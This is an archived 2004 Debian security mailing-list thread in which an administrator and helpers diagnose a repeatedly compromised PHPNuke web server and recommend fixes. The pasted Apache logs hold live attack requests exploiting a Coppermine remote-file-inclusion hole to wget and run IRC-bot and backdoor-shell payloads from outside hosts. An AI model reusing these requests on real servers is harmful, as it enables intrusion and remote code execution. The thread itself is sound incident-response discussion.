RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-23 Thread Ross Tsolakidis 
Thanks for all your help.
The dodgy code has been removed and the server secured !

Thanks again !

--
Ross


-Original Message-
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Saturday, 19 June 2004 11:24 AM
To: Ross Tsolakidis
Cc: [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
 Hi all,
 
 I did a search in the logs on some of the suspicious users and found a
 match.
 The files that are being downloaded then executed see to be IRC bots.
 http://www.energymech.net/
 
 Here are some log files.
 
 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET

/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe

la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
 vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0
200
 6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

 
 All those executables in the /tmp dir seem to be all coming from that
 site on our box, definitely the culprit.
 
 Can someone explain what is going on here ?
 Cause it doesn't make any sense.

  There seems to be some buggy PHP code being used on that site, which 
 is allowing the remote inclusion of  content from the mirabella.net 
 site - this is being abused to run code upon your host.

  You should immediately disable the coppermine PHPNuke module and
 get it patched, upgraded, or replaced.

  Going to securityfocus.com and searching the mailing lists for
 coppermine pulls up multiple hits describing problems - for example
 this post:

http://www.securityfocus.com/archive/1/361976

  Notice the URLs on section E2?  They match yours..

  See this one for more details too:

http://www.securityfocus.com/archive/1/361976

  Two things you can do immediately to stop this particular exploit
 are run safe mode for PHP, and firewall off access to mirabella.net.

 What steps should I take now ?

  Remove PHP Nuke, check the logs for other activity, make sure your
 kernel is patched against local root via the recent wholes, and
 look at using a locked down PHP installation - I'm not sure how
 PHPNuke will work with that, but it's gotta be worth a try.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit



DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.

RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-18 Thread Ross Tsolakidis 
Hi all,

I did a search in the logs on some of the suspicious users and found a
match.
The files that are being downloaded then executed see to be IRC bots.
http://www.energymech.net/

Here are some log files.

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;ps%20x HTTP/1.0 200 8847 - Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)

200.177.162.14 - - [21/May/2004:19:10:06 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooks
equipment.com/newcmd.gif?cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell
HTTP/1.1 200 11813 - Mozilla/4.0 (compatible; MSIE 5.5; Windows 98;
Win 9x 4.90)

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)


All those executables in the /tmp dir seem to be all coming from that
site on our box, definitely the culprit.

Can someone explain what is going on here ?
Cause it doesn't make any sense.

The site in question is a phpnuke site with lots of modules.

What steps should I take now ?

Thanks very much for everyones help.



--
Ross

-Original Message-
From: Ross Tsolakidis 
Sent: Friday, 18 June 2004 9:20 AM
To: [EMAIL PROTECTED]
Subject: RE: Advice needed, trying to find the vulnerable code on Debian
webserver.

Thanks to everyone who has responded.
I will be investigating all these options in the next few days, I'll
keep you all informed. 


--
Ross

-Original Message-
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Thursday, 17 June 2004 3:24 AM
To: [EMAIL PROTECTED]
Cc: Alvin Oga; [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
   
   Install some rules for it to harden your webserver, see if 
   anything is flagged in the security log.
  
  other web server testing tools
  http://www.linux-sec.net/Web/#Testing
 
 Has anyone actually used any of these to find the vulnerabilities that

 are being discussed?

  Not personally, I've used snort and some other custom logging code  to
find exploit attempts in real time though.

  Can you tell us what CGI apps are installed upon the box?  Or  do the
access logs should anything suspicious?  It's clear that  Apache is the
route into the system if you have files owned by  www-data - maybe
mounting /tmp noexec would help?

  (note: mounting /tmp noexec breaks apt often).

  
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



DISCLAIMER: This e-mail and any files transmitted with it may be
privileged and confidential, and are intended only for the use of the
intended recipient. If you are not the intended recipient or responsible
for delivering this e-mail to the intended recipient, any use,
dissemination, forwarding, printing or copying of this e-mail and any
attachments is strictly prohibited. If you have received this e-mail in
error, please REPLY TO the SENDER to advise the error AND then DELETE
the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with it are
those of the individual sender, except where the sender specifically
states them to be the views of our organisation.
Our organisation does not represent or warrant that the attached files
are free from computer viruses or other defects. The user assumes all
responsibility for any loss or damage resulting directly or indirectly
from the use of the attached files. In any event, the liability to our
organisation is limited to either the resupply of the attached files or
the cost of having the attached files resupplied.

RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-18 Thread Ross Tsolakidis 
Hi all,

I did a search in the logs on some of the suspicious users and found a
match.
The files that are being downloaded then executed see to be IRC bots.
http://www.energymech.net/

Here are some log files.

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;ps%20x HTTP/1.0 200 8847 - Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)

200.177.162.14 - - [21/May/2004:19:10:06 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooks
equipment.com/newcmd.gif?cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell
HTTP/1.1 200 11813 - Mozilla/4.0 (compatible; MSIE 5.5; Windows 98;
Win 9x 4.90)

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)


All those executables in the /tmp dir seem to be all coming from that
site on our box, definitely the culprit.

Can someone explain what is going on here ?
Cause it doesn't make any sense.

The site in question is a phpnuke site with lots of modules.

What steps should I take now ?

Thanks very much for everyones help.



--
Ross

-Original Message-
From: Ross Tsolakidis 
Sent: Friday, 18 June 2004 9:20 AM
To: debian-security@lists.debian.org
Subject: RE: Advice needed, trying to find the vulnerable code on Debian
webserver.

Thanks to everyone who has responded.
I will be investigating all these options in the next few days, I'll
keep you all informed. 


--
Ross

-Original Message-
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Thursday, 17 June 2004 3:24 AM
To: [EMAIL PROTECTED]
Cc: Alvin Oga; debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
   
   Install some rules for it to harden your webserver, see if 
   anything is flagged in the security log.
  
  other web server testing tools
  http://www.linux-sec.net/Web/#Testing
 
 Has anyone actually used any of these to find the vulnerabilities that

 are being discussed?

  Not personally, I've used snort and some other custom logging code  to
find exploit attempts in real time though.

  Can you tell us what CGI apps are installed upon the box?  Or  do the
access logs should anything suspicious?  It's clear that  Apache is the
route into the system if you have files owned by  www-data - maybe
mounting /tmp noexec would help?

  (note: mounting /tmp noexec breaks apt often).

  
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



DISCLAIMER: This e-mail and any files transmitted with it may be
privileged and confidential, and are intended only for the use of the
intended recipient. If you are not the intended recipient or responsible
for delivering this e-mail to the intended recipient, any use,
dissemination, forwarding, printing or copying of this e-mail and any
attachments is strictly prohibited. If you have received this e-mail in
error, please REPLY TO the SENDER to advise the error AND then DELETE
the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with it are
those of the individual sender, except where the sender specifically
states them to be the views of our organisation.
Our organisation does not represent or warrant that the attached files
are free from computer viruses or other defects. The user assumes all
responsibility for any loss or damage resulting directly or indirectly
from the use of the attached files. In any event, the liability to our
organisation is limited to either the resupply of the attached files or
the cost of having the attached files resupplied.

RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-17 Thread Ross Tsolakidis 
Thanks to everyone who has responded.
I will be investigating all these options in the next few days, I'll
keep you all informed. 


--
Ross

-Original Message-
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Thursday, 17 June 2004 3:24 AM
To: [EMAIL PROTECTED]
Cc: Alvin Oga; [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
   
   Install some rules for it to harden your webserver, see if 
   anything is flagged in the security log.
  
  other web server testing tools
  http://www.linux-sec.net/Web/#Testing
 
 Has anyone actually used any of these to find the vulnerabilities that

 are being discussed?

  Not personally, I've used snort and some other custom logging code  to
find exploit attempts in real time though.

  Can you tell us what CGI apps are installed upon the box?  Or  do the
access logs should anything suspicious?  It's clear that  Apache is the
route into the system if you have files owned by  www-data - maybe
mounting /tmp noexec would help?

  (note: mounting /tmp noexec breaks apt often).

  
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.

RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-17 Thread Ross Tsolakidis 
Thanks to everyone who has responded.
I will be investigating all these options in the next few days, I'll
keep you all informed. 


--
Ross

-Original Message-
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Thursday, 17 June 2004 3:24 AM
To: [EMAIL PROTECTED]
Cc: Alvin Oga; debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
   
   Install some rules for it to harden your webserver, see if 
   anything is flagged in the security log.
  
  other web server testing tools
  http://www.linux-sec.net/Web/#Testing
 
 Has anyone actually used any of these to find the vulnerabilities that

 are being discussed?

  Not personally, I've used snort and some other custom logging code  to
find exploit attempts in real time though.

  Can you tell us what CGI apps are installed upon the box?  Or  do the
access logs should anything suspicious?  It's clear that  Apache is the
route into the system if you have files owned by  www-data - maybe
mounting /tmp noexec would help?

  (note: mounting /tmp noexec breaks apt often).

  
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.

RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread Ross Tsolakidis 
Wipe, install, set up chkrootkit and run it often. 
I've already done that.  There was no rootkit.

How does phpnuke compromise apache if apache is set up correctly?
I believe it's some of the modules available and running php with 'safe
mode off'.

I need to find the vulnerable code on this box.  And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.


--
Ross



-Original Message-
From: s. keeling [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, 15 June 2004 2:06 PM
To: [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

Incoming from Ross Tsolakidis:
 
 One of our webservers seems to get compromised on a daily basis.
 When I do a ps ax I see these processes all the time.
 
 18687 ?S  0:00 shell
 18701 ?Z  0:00 [sh defunct]
 18704 ?T  0:00 ./3 200.177.162.185 1524

I vaguely remember that 3 in /tmp is slapper.  Wipe, install, set up
chkrootkit and run it often.

How does phpnuke compromise apache if apache is set up correctly?


--
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.

RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread Ross Tsolakidis 
Wipe, install, set up chkrootkit and run it often. 
I've already done that.  There was no rootkit.

How does phpnuke compromise apache if apache is set up correctly?
I believe it's some of the modules available and running php with 'safe
mode off'.

I need to find the vulnerable code on this box.  And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.


--
Ross



-Original Message-
From: s. keeling [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, 15 June 2004 2:06 PM
To: debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

Incoming from Ross Tsolakidis:
 
 One of our webservers seems to get compromised on a daily basis.
 When I do a ps ax I see these processes all the time.
 
 18687 ?S  0:00 shell
 18701 ?Z  0:00 [sh defunct]
 18704 ?T  0:00 ./3 200.177.162.185 1524

I vaguely remember that 3 in /tmp is slapper.  Wipe, install, set up
chkrootkit and run it often.

How does phpnuke compromise apache if apache is set up correctly?


--
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.

Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-14 Thread Ross Tsolakidis 
Hi all,

One of our webservers seems to get compromised on a daily basis.
When I do a ps ax I see these processes all the time.

18687 ?S  0:00 shell
18701 ?Z  0:00 [sh defunct]
18704 ?T  0:00 ./3 200.177.162.185 1524
18705 ?Z  0:00 [3 defunct]

And if I check the /tmp dir there are strange executable files in there
that are owned by www-data.
Such as ./3 and others like ./bdshell.
Definitely some sort of Trojan that's being run by www-data user.

When I did a virus check first time it showed that it was infected with
the old Linux.RST virus, it basically stuffed the entire /bin directory.

I did a rebuild, virus checked all client files on a different server,
then copied them back.

After a week, same thing.
Infected.

/tmp/sl# ls -al
total 452
drwxr-xr-x2 www-data www-data 4096 Jun  1 09:32 .
drwxrwxrwt3 root root 4096 Jun  1 09:37 ..
-rwsrwsrwt1 www-data www-data   446714 May 29 05:12 ps.htm

I'm pretty sure it's one of our clients who has some dodgy php-nuke
sites or something like that.

All our other webservers are fine running the same build.
But this server is the major client one where we allow them to FTP, CGI
and make MYSQL changes.

I'd appreciate some help on how to stop this from happening.

Running Debian Stable with all the security updates.

P.S. Sorry for the Disclaimer, company policy, which I don't agree with,
yet they pay me so I must comply  :/

--
Ross.

DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.

Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-14 Thread Ross Tsolakidis 
Hi all,

One of our webservers seems to get compromised on a daily basis.
When I do a ps ax I see these processes all the time.

18687 ?S  0:00 shell
18701 ?Z  0:00 [sh defunct]
18704 ?T  0:00 ./3 200.177.162.185 1524
18705 ?Z  0:00 [3 defunct]

And if I check the /tmp dir there are strange executable files in there
that are owned by www-data.
Such as ./3 and others like ./bdshell.
Definitely some sort of Trojan that's being run by www-data user.

When I did a virus check first time it showed that it was infected with
the old Linux.RST virus, it basically stuffed the entire /bin directory.

I did a rebuild, virus checked all client files on a different server,
then copied them back.

After a week, same thing.
Infected.

/tmp/sl# ls -al
total 452
drwxr-xr-x2 www-data www-data 4096 Jun  1 09:32 .
drwxrwxrwt3 root root 4096 Jun  1 09:37 ..
-rwsrwsrwt1 www-data www-data   446714 May 29 05:12 ps.htm

I'm pretty sure it's one of our clients who has some dodgy php-nuke
sites or something like that.

All our other webservers are fine running the same build.
But this server is the major client one where we allow them to FTP, CGI
and make MYSQL changes.

I'd appreciate some help on how to stop this from happening.

Running Debian Stable with all the security updates.

P.S. Sorry for the Disclaimer, company policy, which I don't agree with,
yet they pay me so I must comply  :/

--
Ross.

DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.